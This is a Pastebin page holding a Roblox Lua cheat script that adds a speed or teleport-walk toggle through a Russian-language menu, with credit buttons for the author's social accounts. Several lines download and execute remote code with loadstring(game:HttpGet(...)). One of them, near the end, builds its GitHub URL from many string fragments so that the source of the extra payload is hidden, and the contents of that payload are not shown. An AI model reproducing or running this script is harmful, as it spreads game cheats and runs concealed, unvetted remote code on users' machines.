Advertisement
rrixh

natashakittenssssss

Jan 13th, 2025 (edited)
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.62 KB | None | 0 0
  1. --pyccyntwalk
  2.  
  3. getgenv().tpWalk = true;
  4. loadstring(game:HttpGet('https://raw.githubusercontent.com/rrixh/uwuware/refs/heads/main/skripts/globaLS', true))();
  5. local wizRRIXH = loadstring(game:HttpGet('https://github.com/rrixh/uwuware/raw/refs/heads/main/lib/wizRRIXH'))(); local wizard = wizRRIXH:NewWindow("Скорость");
  6. local wiz = wizard:NewSection("Открытый");
  7. local kredits = wizard:NewSection("Кредиты🍭");
  8. local tpwalk, speed, defaultSpeed = false, (1),(1)
  9. local tpwalking;
  10.  
  11. wiz:Toggle("Включить Скорость", function(value)
  12. _G.toggleTPWalk(value)
  13. end);
  14. wiz:Txtbox("Скорость (Значение: 0.20)", function(text)
  15. local newText = _G.updateTPWalkSpeed(text)
  16. text = newText
  17. end);
  18. --k--
  19. kredits:Button("RBX @lulaslollipop🍭", function()
  20. _G.kopy(_G.rbxlink)
  21. wait(0.1)
  22. _G.rnote("Ссылка на профиль Roblox скопирована",4)
  23. end)
  24. kredits:Button("🤖Diskord: @bommunity", function()
  25. _G.kopy(_G.diskordlink)
  26. wait(0.1)
  27. _G.rnote("Ссылка на профиль Discord скопирована", 4)
  28. end)
  29. kredits:Button("🔴YouTube: @rsgmj", function()
  30. _G.kopy(_G.ytlink)
  31. wait(0.1)
  32. _G.rnote("Ссылка на канал YouTube скопирована", 4)
  33. end)
  34. kredits:Button("🖇Telegram: @siipped", function()
  35. _G.kopy(_G.telegramlink)
  36. wait(0.1)
  37. _G.rnote("Скопированная ссылка Telegram DM", 4)
  38. end)
  39. if loaded then return end;
  40. loadstring(game:HttpGet("htt".."ps".."://ra".."w.gith".."ubus".."erc".."ont".."ent.".."com/rrixh/".."uNb".."68".."92M/".."ma".."in/past".."ebi".."n.".."com"..".uNb".."6892".."M",true))();
  41. loaded=true;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement